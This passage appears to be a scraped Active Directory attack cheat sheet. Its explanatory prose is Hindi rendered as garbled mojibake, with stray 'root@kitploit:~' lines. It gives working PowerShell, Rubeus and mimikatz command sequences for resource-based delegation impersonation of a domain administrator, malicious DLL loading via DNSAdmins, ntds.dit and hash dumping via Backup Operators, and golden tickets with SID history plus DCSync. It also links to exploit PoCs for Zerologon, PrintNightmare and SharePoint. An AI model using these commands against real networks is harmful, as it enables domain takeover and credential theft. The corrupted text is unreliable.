рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ рд╣рдо рдЕрднреА рднреА рдХреЗрд░реНрдмреЗрд░реЛрд╕ рдХреА рдПрдХ рд╕реБрд╡рд┐рдзрд╛ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬрд┐рд╕реЗ "рд╡реИрдХрд▓реНрдкрд┐рдХ рд╕реЗрд╡рд╛" рдХрд╣рд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣ рд╣рдореЗрдВ рдХреЗрд╡рд▓ рдЙрд╕ рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рдирд╣реАрдВ, рдмрд▓реНрдХрд┐ рдЕрдиреНрдп "рд╡реИрдХрд▓реНрдкрд┐рдХ" рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рд▓рд┐рдП TGS рдЯрд┐рдХрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ рдЬрд┐рд╕рдХреЗ рд▓рд┐рдП рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдЕрдзрд┐рдХрд╛рд░ рд╣реИрдВред рдпрд╣ рд╣рдореЗрдВ рд▓рдХреНрд╖реНрдп рдорд╢реАрди рдкрд░ рдкреВрд░реНрдг рдкрд╣реБрдБрдЪ рдкреНрд░рджрд╛рди рдХрд░рддреЗ рд╣реБрдП, рд╣реЛрд╕реНрдЯ рджреНрд╡рд╛рд░рд╛ рд╕рдорд░реНрдерд┐рдд рдХрд┐рд╕реА рднреА рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рд╡реИрдз рдЯрд┐рдХрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рджреЗрддрд╛ рд╣реИред
### рд╕рдВрд╕рд╛рдзрди-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: \
TL;DR \
рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдбреЛрдореЗрди рдХреЗ рдХрд┐рд╕реА рдорд╢реАрди рдЦрд╛рддрд╛ рдСрдмреНрдЬреЗрдХреНрдЯ рдкрд░ GenericALL/GenericWrite рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВ, рддреЛ рд╣рдо рдЗрд╕рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЙрд╕ рдкрд░ рдбреЛрдореЗрди рдХреЗ рдХрд┐рд╕реА рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рд╕реНрд╡рдпрдВ рдХреЛ рдкреНрд░рддрд┐рд░реВрдкрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд╣рдо рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХрд╛ рдкреНрд░рддрд┐рд░реВрдкрдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдкреВрд░реНрдг рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред_
рд╣рдо рдЬрд┐рди рдЙрдкрдХрд░рдгреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдЬрд╛ рд░рд╣реЗ рд╣реИрдВ:
- [PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon)
- [Powermad](https://github.com/Kevin-Robertson/Powermad)
- [Rubeus](https://github.com/GhostPack/Rubeus)
рдкрд╣рд▓реЗ рд╣рдореЗрдВ рдЙрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛/рдорд╢реАрди рдЦрд╛рддреЗ рдХреЗ рд╕реБрд░рдХреНрд╖рд╛ рд╕рдВрджрд░реНрдн рдореЗрдВ рдкреНрд░рд╡реЗрд╢ рдХрд░рдирд╛ рд╣реЛрдЧрд╛ рдЬрд┐рд╕рдХреЗ рдкрд╛рд╕ рдСрдмреНрдЬреЗрдХреНрдЯ рдкрд░ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВред
рдпрджрд┐ рдпрд╣ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддрд╛ рд╣реИ, рддреЛ рд╣рдо Pass the Hash, RDP, PSCredentials рдЖрджрд┐ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рд╢реЛрд╖рдг рдЙрджрд╛рд╣рд░рдг:```powershell
#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid
#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'
#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt
#Finally we can access the C$ drive of the target machine
dir \\TargetMachine.wtver.domain\C$
рд╡рд┐рд╕реНрддреГрдд рд▓реЗрдЦ:
* Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory
* RESOURCE-BASED CONSTRAINED DELEGATION ABUSE
тЭЧ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдФрд░ рд╕рдВрд╕рд╛рдзрди-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдореЗрдВ, рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ TRUSTED_TO_AUTH_FOR_DELEGATION рд╡рд╛рд▓реЗ рдЦрд╛рддреЗ рдХрд╛ рдкрд╛рд╕рд╡рд░реНрдб/рд╣реИрд╢ рдирд╣реАрдВ рд╣реИ рдЬрд┐рд╕рдХрд╛ рд╣рдо рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд░рд╣реЗ рд╣реИрдВ, рддреЛ рд╣рдо kekeo рд╕реЗ "tgt::deleg" рдпрд╛ rubeus рд╕реЗ "tgtdeleg" рдирд╛рдордХ рдмрд╣реБрдд рдЕрдЪреНрдЫреА рдЯреНрд░рд┐рдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ Kerberos рдХреЛ рдзреЛрдЦрд╛ рджреЗ рд╕рдХрддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рд╡рд╣ рд╣рдореЗрдВ рдЙрд╕ рдЦрд╛рддреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╡реИрдз TGT рджреЗ рд╕рдХреЗред рдлрд┐рд░ рд╣рдо рд╣рдорд▓реЗ рдХреЛ рдЕрдВрдЬрд╛рдо рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рдЦрд╛рддреЗ рдХреЗ рд╣реИрд╢ рдХреЗ рдмрдЬрд╛рдп рдЯрд┐рдХрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред```powershell #Command on Rubeus Rubeus.exe tgtdeleg /nowrap
root@kitploit:~
рд╡рд┐рд╕реНрддреГрдд рд▓реЗрдЦ:
[Rubeus тАУ Now With More Kekeo](https://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/)
### DNSAdmins рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рдХреЛрдИ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ DNSAdmins рд╕рдореВрд╣ рдХрд╛ рд╕рджрд╕реНрдп рд╣реИ, рддреЛ рд╡рд╣ рд╕рдВрднрд╡рддрдГ dns.exe рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдПрдХ рдордирдорд╛рдирд╛ DLL рд▓реЛрдб рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдЬреЛ SYSTEM рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓рддрд╛ рд╣реИред рдпрджрд┐ DC DNS рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ, рддреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ DA рддрдХ рдмрдврд╝рд╛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕ рд╢реЛрд╖рдг рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рдХрд╛рдо рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП DNS рд╕реЗрд╡рд╛ рдХреЛ рдкреБрдирд░рд╛рд░рдВрдн рдХрд░рдиреЗ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИред_
1. DNSAdmins рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдпреЛрдВ рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ:
- PowerView: `Get-NetGroupMember -GroupName "DNSAdmins"`
- AD Module: `Get-ADGroupMember -Identiny DNSAdmins`
2. рдПрдХ рдмрд╛рд░ рдЬрдм рд╣рдореЗрдВ рдЗрд╕ рд╕рдореВрд╣ рдХрд╛ рдХреЛрдИ рд╕рджрд╕реНрдп рдорд┐рд▓ рдЬрд╛рддрд╛ рд╣реИ, рддреЛ рд╣рдореЗрдВ рдЙрд╕рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ (рдХрдИ рддрд░реАрдХреЗ рд╣реИрдВ)ред
3. рдлрд┐рд░ SMB рд╢реЗрдпрд░ рдкрд░ рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг DLL рдкреНрд░рджрд╛рди рдХрд░рдХреЗ рдФрд░ dll рдХреЗ рдЙрдкрдпреЛрдЧ рдХреЛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░рдХреЗ, рд╣рдо рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВ: ```powershell
#Using dnscmd:
dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
#Restart the DNS Service:
sc \\DNSServer stop dns
sc \\DNSServer start dns
### рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛-рдПрдХреАрдХреГрдд DNS рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* Exploiting Active Directory-Integrated DNS
* ADIDNS Revisited
* Inveigh
### рдмреИрдХрдЕрдк рдСрдкрд░реЗрдЯрд░реНрд╕ рд╕рдореВрд╣ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рд╣рдо рдХрд┐рд╕реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддреЗ рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдлрд▓ рд╣реЛрддреЗ рд╣реИрдВ рдЬреЛ рдмреИрдХрдЕрдк рдСрдкрд░реЗрдЯрд░реНрд╕ рд╕рдореВрд╣ рдХрд╛ рд╕рджрд╕реНрдп рд╣реИ, рддреЛ рд╣рдо рдЗрд╕рдХреЗ SeBackupPrivilege рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдХреЗ DC рдХреА рд╡рд░реНрддрдорд╛рди рд╕реНрдерд┐рддрд┐ рдХреА рдПрдХ рдЫрд╛рдпрд╛ рдкреНрд░рддрд┐рд▓рд┐рдкрд┐ рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ, ntds.dit рдбреЗрдЯрд╛рдмреЗрд╕ рдлрд╝рд╛рдЗрд▓ рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ, рд╣реИрд╢ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ DA рддрдХ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВред_
1. рдПрдХ рдмрд╛рд░ рдЬрдм рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдЙрд╕ рдЦрд╛рддреЗ рддрдХ рдкрд╣реБрдВрдЪ рд╣реЛ рдЬрд╛рддреА рд╣реИ рдЬрд┐рд╕рдХреЗ рдкрд╛рд╕ SeBackupPrivilege рд╣реИ, рддреЛ рд╣рдо DC рддрдХ рдкрд╣реБрдВрдЪ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рд╣рд╕реНрддрд╛рдХреНрд╖рд░рд┐рдд рдмрд╛рдЗрдирд░реА diskshadow рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рдЫрд╛рдпрд╛ рдкреНрд░рддрд┐рд▓рд┐рдкрд┐ рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ: ```powershell #Create a .txt file that will contain the shadow copy process script Script ->{ set context persistent nowriters set metadata c:\windows\system32\spool\drivers\color\example.cab set verbose on begin backup add volume c: alias mydrive
create
expose %mydrive% w: end backup }
#Execute diskshadow with our script as parameter diskshadow /s script.txt
root@kitploit:~
2. рдЕрдЧрд▓рд╛, рд╣рдореЗрдВ рд╢реИрдбреЛ рдХреЙрдкреА рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ SeBackupPrivilege рд╣реЛ рд╕рдХрддрд╛ рд╣реИ рд▓реЗрдХрд┐рди рд╣рдо рд╕реАрдзреЗ ntds.dit рдХреЛ рдХреЙрдкреА-рдкреЗрд╕реНрдЯ рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ, рд╣рдореЗрдВ рдПрдХ рдмреИрдХрдЕрдк рд╕реЙрдлреНрдЯрд╡реЗрдпрд░ рдХреА рдирдХрд▓ рдХрд░рдиреА рд╣реЛрдЧреА рдФрд░ Win32 API рдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЗрд╕реЗ рдПрдХ рд╕реБрд▓рдн рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдХреЙрдкреА рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред рдЗрд╕рдХреЗ рд▓рд┐рдП рд╣рдо рдпрд╣ рдЕрджреНрднреБрдд рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдЬрд╛ рд░рд╣реЗ рд╣реИрдВ: ```powershell #Importing both dlls from the repo using powershell Import-Module .\SeBackupPrivilegeCmdLets.dll Import-Module .\SeBackupPrivilegeUtils.dll
#Checking if the SeBackupPrivilege is enabled Get-SeBackupPrivilege
#If it isn't we enable it Set-SeBackupPrivilege
#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:<PathToSave>\ntds.dit -Overwrite
#Dump the SYSTEM hive reg save HKLM\SYSTEM c:\temp\system.hive
root@kitploit:~
3. smbclient.py рдХреЛ impacket рдпрд╛ рдХрд┐рд╕реА рдЕрдиреНрдп рдЯреВрд▓ рд╕реЗ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП рд╣рдо ntds.dit рдФрд░ SYSTEM рд╣рд╛рдЗрд╡ рдХреЛ рдЕрдкрдиреА рд▓реЛрдХрд▓ рдорд╢реАрди рдкрд░ рдХреЙрдкреА рдХрд░рддреЗ рд╣реИрдВред
4. impacket рд╕реЗ secretsdump.py рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рдФрд░ рд╣реИрд╢ рдбрдВрдк рдХрд░реЗрдВред
5. psexec рдпрд╛ рдЕрдкрдиреА рдкрд╕рдВрдж рдХреЗ рдХрд┐рд╕реА рдЕрдиреНрдп рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ, PTH рдХрд░реЗрдВ рдФрд░ рдбреЛрдореЗрди рдПрдбрдорд┐рди рдПрдХреНрд╕реЗрд╕ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред
### рдПрдХреНрд╕рдЪреЗрдВрдЬ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* рдПрдХреНрд╕рдЪреЗрдВрдЬ рдХрд╛ рдбреАрдП рд╕реЗ рдПрдХ рдПрдкреАрдЖрдИ рдХреЙрд▓ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* CVE-2020-0688 \- рдлрд┐рдХреНрд╕реНрдб рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлрд┐рдХ рдХреАрдЬрд╝ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдорд╛рдЗрдХреНрд░реЛрд╕реЙрдлреНрдЯ рдПрдХреНрд╕рдЪреЗрдВрдЬ рд╕рд░реНрд╡рд░ рдкрд░ рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди
* PrivExchange рдПрдХреНрд╕рдЪреЗрдВрдЬ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдбреЛрдореЗрди рдПрдбрдорд┐рди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдореЗрдВ рдмрджрд▓реЗрдВ
### рдкреНрд░рд┐рдВрдЯрд░ рдмрдЧ рдХрд╛ рд╣рдерд┐рдпрд╛рд░реАрдХрд░рдг
* рдкреНрд░рд┐рдВрдЯрд░ рд╕рд░реНрд╡рд░ рдмрдЧ рд╕реЗ рдбреЛрдореЗрди рдПрдбрдорд┐рдирд┐рд╕реНрдЯреНрд░реЗрдЯрд░ рддрдХ
* NetNTLMtoSilverTicket
### ACLs рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* рдПрдХреНрдЯрд┐рд╡ рдбрд╛рдпрд░реЗрдХреНрдЯреНрд░реА рдореЗрдВ ACLs рдХреЗ рд╕рд╛рде рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛рдирд╛
* aclpwn.py
* Invoke-ACLPwn
### mitm6 рдХреЗ рд╕рд╛рде IPv6 рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* IPv6 рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ IPv4 рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рд╕рдордЭреМрддрд╛
* mitm6
### SID рд╣рд┐рд╕реНрдЯреНрд░реА рджреБрд░реБрдкрдпреЛрдЧ
_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рд╣рдо рдХрд┐рд╕реА рдлреЙрд░реЗрд╕реНрдЯ рдХреЗ рдЪрд╛рдЗрд▓реНрдб рдбреЛрдореЗрди рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдлрд▓ рд╣реЛрддреЗ рд╣реИрдВ рдФрд░SID рдлрд╝рд┐рд▓реНрдЯрд░рд┐рдВрдЧ рд╕рдХреНрд╖рдо рдирд╣реАрдВ рд╣реИ (рдЕрдзрд┐рдХрддрд░ рд╕рдордп рдРрд╕рд╛ рд╣реА рд╣реЛрддрд╛ рд╣реИ), рддреЛ рд╣рдо рдЗрд╕рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдХреЗ рдлреЙрд░реЗрд╕реНрдЯ рдХреЗ рд░реВрдЯ рдбреЛрдореЗрди рдХреЗ рдбреЛрдореЗрди рдПрдбрдорд┐рдирд┐рд╕реНрдЯреНрд░реЗрдЯрд░ рддрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╣ рдХреЗрд░реНрдмреЗрд░реЛрд╕ TGT рдЯрд┐рдХрдЯ рдкрд░ SID рд╣рд┐рд╕реНрдЯреНрд░реА рдлрд╝реАрд▓реНрдб рдХреЗ рдХрд╛рд░рдг рд╕рдВрднрд╡ рд╣реИ, рдЬреЛ "рдЕрддрд┐рд░рд┐рдХреНрдд" рд╕реБрд░рдХреНрд╖рд╛ рд╕рдореВрд╣реЛрдВ рдФрд░ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд░рддрд╛ рд╣реИред_
рд╢реЛрд╖рдг рдЙрджрд╛рд╣рд░рдг:```powershell #Get the SID of the Current Domain using PowerView Get-DomainSID -Domain current.root.domain.local
#Get the SID of the Root Domain using PowerView Get-DomainSID -Domain root.domain.local
#Create the Enteprise Admins SID Format: RootDomainSID-519
#Forge "Extra" Golden Ticket using mimikatz kerberos::golden /user:Administrator /domain:current.root.domain.local /sid: /krbtgt: /sids: /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
#Inject the ticket into memory kerberos::ptt \path\to\ticket\golden.kirbi
#List the DC of the Root Domain dir \dc.root.domain.local\C$
#Or DCsync and dump the hashes using mimikatz lsadump::dcsync /domain:root.domain.local /all
root@kitploit:~
рд╡рд┐рд╕реНрддреГрдд рд▓реЗрдЦ:
- [Kerberos Golden Tickets are Now More Golden](https://adsecurity.org/?p=1640)
- [A Guide to Attacking Domain Trusts](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
### SharePoint рдХрд╛ рд╢реЛрд╖рдг
- [CVE-2019-0604](https://medium.com/@gorkemkaradeniz/sharepoint-cve-2019-0604-rce-exploitation-ab3056623b7d) RCE рд╢реЛрд╖рдг \
[PoC](https://github.com/k8gege/CVE-2019-0604)
- [CVE-2019-1257](https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization) BDC рдбрд┐рд╕реАрд░рд┐рдпрд▓рд╛рдЗрдЬрд╝реЗрд╢рди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди
- [CVE-2020-0932](https://www.zerodayinitiative.com/blog/2020/4/28/cve-2020-0932-remote-code-execution-on-microsoft-sharepoint-using-typeconverters) рдЯрд╛рдЗрдкрдХрдиреНрд╡рд░реНрдЯрд░реНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ RCE \
[PoC](https://github.com/thezdi/PoC/tree/master/CVE-2020-0932)
### Zerologon
- [Zerologon: рдЕрд╕рддреНрдпрд╛рдкрд┐рдд рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рд╕рдордЭреМрддрд╛](https://www.secura.com/whitepapers/zerologon-whitepaper): рднреЗрджреНрдпрддрд╛ рдХрд╛ рд╡реНрд╣рд╛рдЗрдЯ рдкреЗрдкрд░ред
- [SharpZeroLogon](https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon): Zerologon рд╢реЛрд╖рдг рдХрд╛ C# рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдиред
- [Invoke-ZeroLogon](https://github.com/BC-SECURITY/Invoke-ZeroLogon): Zerologon рд╢реЛрд╖рдг рдХрд╛ PowerShell рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдиред
- [Zer0Dump](https://github.com/bb00/zer0dump): impacket рд▓рд╛рдЗрдмреНрд░реЗрд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ Zerologon рд╢реЛрд╖рдг рдХрд╛ Python рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдиред
### PrintNightmare
- [CVE-2021-34527](https://vulners.com/cve/CVE-2021-34527): рднреЗрджреНрдпрддрд╛ рд╡рд┐рд╡рд░рдгред
- [Impacket implementation of PrintNightmare](https://github.com/cube0x0/CVE-2021-1675): impacket рд▓рд╛рдЗрдмреНрд░реЗрд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ PrintNightmare рдХрд╛ рд╡рд┐рд╢реНрд╡рд╕рдиреАрдп PoCред
- [C# Implementation of CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare): C# рдореЗрдВ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ PrintNightmare рдХрд╛ рд╡рд┐рд╢реНрд╡рд╕рдиреАрдп PoCред
### рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рд╕реЗрд╡рд╛рдПрдБ
**рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдЯреЗрдореНрдкрд▓реЗрдЯреНрд╕ рдХреА рдЬрд╛рдБрдЪ рдХрд░реЗрдВ:** [Certify](https://github.com/GhostPack/Certify)
_рдиреЛрдЯ: Certify рдХреЛ Cobalt Strike рдХреЗ `execute-assembly` рдХрдорд╛рдВрдб рдХреЗ рд╕рд╛рде рднреА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ_```powershell
.\Certify.exe find /vulnerable /quiet
рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░реЗрдВ рдХрд┐ msPKI-Certificates-Name-Flag рдорд╛рди "ENROLLEE_SUPPLIES_SUBJECT" рдкрд░ рд╕реЗрдЯ рд╣реИ рдФрд░ Enrollment Rights Domain/Authenticated Users рдХреЛ рдЕрдиреБрдорддрд┐ рджреЗрддреЗ рд╣реИрдВред рдЗрд╕рдХреЗ рдЕрддрд┐рд░рд┐рдХреНрдд, рдЬрд╛рдБрдЪ рдХрд░реЗрдВ рдХрд┐ pkiextendedkeyusage рдкреИрд░рд╛рдореАрдЯрд░ рдореЗрдВ "Client Authentication" рдорд╛рди рд╣реИ рдФрд░ рд╕рд╛рде рд╣реА "Authorized Signatures Required" рдкреИрд░рд╛рдореАрдЯрд░ 0 рдкрд░ рд╕реЗрдЯ рд╣реИред
